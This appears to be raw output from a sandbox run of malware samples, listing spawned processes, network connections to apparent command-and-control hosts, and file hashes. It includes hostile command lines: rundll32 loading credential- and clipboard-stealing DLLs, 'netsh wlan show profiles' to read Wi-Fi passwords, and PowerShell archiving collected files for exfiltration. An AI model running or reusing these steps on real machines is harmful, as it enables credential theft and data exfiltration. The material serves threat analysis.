"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe
"C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfbd3cc40,0x7ffdfbd3cc4c,0x7ffdfbd3cc58
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\565375082730_Desktop.zip' -CompressionLevel Optimal
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3280,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3264 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1816,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3676 /prefetch:3
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1820,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3712 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2656,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3860 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2648,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3972 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4372,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4396 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\random.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\random.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3872,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4720 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe
"C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\client.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\client.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4916,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4912 /prefetch:1
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1904,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=5028 /prefetch:8
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b735857d-e559-49b6-b15c-b9318ed9a008} 6780 "\\.\pipe\gecko-crash-server-pipe.6780" gpu
C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\AppData\Roaming\new.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Windows\explorer.exe
explorer.exe
Network
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| GB | 184.25.193.234:443 | www.microsoft.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| IR | 151.241.114.78:40500 | udp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 67.205.154.243:35184 | tcp | |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| KR | 3.36.173.8:50500 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| RU | 83.239.55.170:40500 | udp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| KR | 3.36.173.8:50500 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| RU | 188.119.66.185:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| NL | 31.214.157.206:2024 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| HK | 154.92.19.29:1231 | 154.92.19.29 | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| IR | 5.134.199.85:40500 | udp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 67.205.154.243:35184 | tcp | |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 3.5.27.45:443 | bbuseruploads.s3.amazonaws.com | tcp |
| YE | 46.161.245.208:40500 | udp | |
| N/A | 127.0.0.1:55035 | tcp | |
| N/A | 127.0.0.1:55051 | tcp | |
| N/A | 127.0.0.1:55064 | tcp | |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| GB | 104.86.110.120:443 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| US | 20.42.65.90:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 20.140.56.69:443 | fp-afd.azurefd.us | tcp |
| N/A | 127.0.0.1:55069 | tcp | |
| N/A | 127.0.0.1:55080 | tcp | |
| N/A | 127.0.0.1:55110 | tcp | |
| UZ | 83.222.7.85:40500 | udp | |
| US | 172.202.64.254:443 | arc-ring.msedge.net | tcp |
| US | 52.123.128.254:443 | dual-s-ring.msedge.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| YE | 134.35.205.29:40500 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| US | 38.224.37.24:40500 | udp | |
| KR | 3.36.173.8:50500 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| IR | 185.80.102.252:40500 | udp | |
| DE | 193.161.193.99:35184 | tcp | |
| CO | 181.131.217.244:30201 | navegacionseguracol24vip.org | tcp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| RU | 91.240.118.204:8000 | 91.240.118.204 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| UZ | 89.236.217.71:40500 | udp | |
| RU | 94.198.55.181:4337 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| DE | 212.113.107.84:80 | 212.113.107.84 | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| MX | 189.133.187.71:40500 | udp | |
| GB | 142.250.187.195:443 | beacons.gcp.gvt2.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 172.16.16.140:40500 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| SG | 216.107.138.162:40500 | udp | |
| US | 67.205.154.243:35184 | tcp | |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| US | 54.231.203.81:80 | pentestfiles.s3.amazonaws.com | tcp |
| GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| UZ | 217.30.162.37:40500 | udp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| YE | 46.161.233.39:40500 | udp | |
| KR | 3.36.173.8:50500 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| GB | 2.18.27.153:443 | metadata.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.252.136:443 | binaries.templates.cdn.office.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 198.163.204.6:40500 | udp | |
| KR | 3.36.173.8:50500 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| RU | 188.119.66.185:443 | tcp | |
| NL | 31.214.157.206:2024 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| UZ | 45.150.26.122:40500 | tcp | |
| UZ | 90.156.163.98:40500 | udp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| CA | 35.183.28.21:80 | status.mycompliancereports.com | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| IR | 5.232.155.0:40500 | udp | |
| US | 3.165.224.162:443 | d2e5gvivzj4g90.cloudfront.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| PK | 202.70.150.106:40500 | udp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| KR | 3.36.173.8:50500 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| IR | 188.215.221.55:40500 | udp | |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | home.sevjs17sr.top | udp |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| UZ | 89.236.219.80:40500 | udp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| IR | 89.219.115.156:40500 | tcp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| RU | 185.81.68.147:1912 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| KZ | 5.251.47.42:40500 | udp | |
| KR | 3.36.173.8:50500 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| UZ | 89.249.62.7:40500 | udp | |
| US | 216.239.36.21:443 | virustotal.com | tcp |
| US | 216.239.36.21:443 | virustotal.com | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 216.239.36.21:80 | virustotal.com | tcp |
| US | 216.239.36.21:80 | virustotal.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| US | 216.239.36.21:443 | virustotal.com | tcp |
| YE | 178.130.103.42:40500 | udp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| FR | 172.217.20.206:443 | clients2.google.com | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| SY | 82.137.218.134:40500 | udp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| UZ | 185.203.237.215:40500 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 67.205.154.243:35184 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| IR | 85.185.237.83:40500 | udp | |
| KR | 3.36.173.8:50500 | tcp | |
| RU | 188.119.66.185:443 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| US | 162.159.135.234:443 | gateway.discord.gg | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| NL | 31.214.157.206:2024 | tcp | |
| IR | 91.185.130.166:40500 | udp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| IR | 93.119.90.81:40500 | udp | |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| IR | 93.118.99.152:40500 | udp | |
| DE | 193.161.193.99:35184 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| IR | 2.191.14.149:40500 | udp | |
| KZ | 46.36.149.47:40500 | tcp | |
| GB | 20.26.156.215:80 | github.com | tcp |
| KR | 3.36.173.8:50500 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 67.205.154.243:35184 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| UZ | 90.156.160.6:40500 | udp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| UZ | 195.158.18.194:40500 | udp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 67.205.154.243:35184 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| IR | 2.181.218.207:40500 | udp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| RU | 90.189.250.159:40500 | udp | |
| IR | 2.190.67.184:40500 | tcp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| FR | 82.64.156.123:80 | tcp | |
| UZ | 87.237.234.159:40500 | udp | |
| CO | 181.131.217.244:1515 | navegacionseguracol24vip.org | tcp |
| IE | 20.190.159.2:443 | login.microsoftonline.com | tcp |
| NL | 31.214.157.206:2024 | tcp | |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 67.205.154.243:35184 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| IR | 5.219.134.102:40500 | udp | |
| NL | 31.214.157.206:2024 | tcp | |
| KR | 3.36.173.8:50500 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| GB | 104.86.110.120:443 | tcp | |
| KZ | 82.200.228.118:40500 | udp | |
| YE | 134.35.158.149:40500 | udp | |
| KZ | 5.251.234.88:40500 | udp | |
| UZ | 90.156.160.10:40500 | udp | |
| MX | 187.223.139.73:40500 | udp | |
| KZ | 92.46.228.246:40500 | udp | |
| IR | 2.177.228.237:40500 | udp | |
| UZ | 90.156.162.48:40500 | udp | |
| NE | 41.138.38.164:40500 | udp | |
| IR | 80.250.196.82:40500 | udp | |
| SY | 88.86.12.98:40500 | udp | |
| UZ | 89.249.62.14:40500 | udp | |
| UZ | 90.156.160.30:40500 | udp |
Files
memory/4396-587-0x0000000000E40000-0x0000000000EDA000-memory.dmp
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe
| MD5 | 1aaef5ae68c230b981da07753b9f8941 |
| SHA1 | 36c376f5a812492199a8cd9c69e5016ff145ef24 |
| SHA256 | 71b3033574f81390983318421237ac73277410cfdd2f2f256b4c66d51b6988d6 |
| SHA512 | 83852533fd0a7598e63f69ebeb29cce40f0a4bf47129d6477827a6900b46db7324c0fc433fd5abf64c040c5976e3d6574d5544669c5c45abf98945916598dcb3 |
C:\Users\Admin\AppData\Local\Temp\_MEI47562\ucrtbase.dll
| MD5 | 0e0bac3d1dcc1833eae4e3e4cf83c4ef |
| SHA1 | 4189f4459c54e69c6d3155a82524bda7549a75a6 |
| SHA256 | 8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae |
| SHA512 | a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd |
C:\Users\Admin\AppData\Local\Temp\_MEI47562\python310.dll
| MD5 | 69d4f13fbaeee9b551c2d9a4a94d4458 |
| SHA1 | 69540d8dfc0ee299a7ff6585018c7db0662aa629 |
| SHA256 | 801317463bd116e603878c7c106093ba7db2bece11e691793e93065223fc7046 |
| SHA512 | 8e632f141daf44bc470f8ee677c6f0fdcbcacbfce1472d928576bf7b9f91d6b76639d18e386d5e1c97e538a8fe19dd2d22ea47ae1acf138a0925e3c6dd156378 |
C:\Users\Admin\AppData\Local\Temp\_MEI47562\VCRUNTIME140.dll
| MD5 | 870fea4e961e2fbd00110d3783e529be |
| SHA1 | a948e65c6f73d7da4ffde4e8533c098a00cc7311 |
| SHA256 | 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644 |
| SHA512 | 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88 |
memory/1440-755-0x00007FFDFC1E0000-0x00007FFDFC64E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI47562\base_library.zip
| MD5 | fbd6be906ac7cd45f1d98f5cb05f8275 |
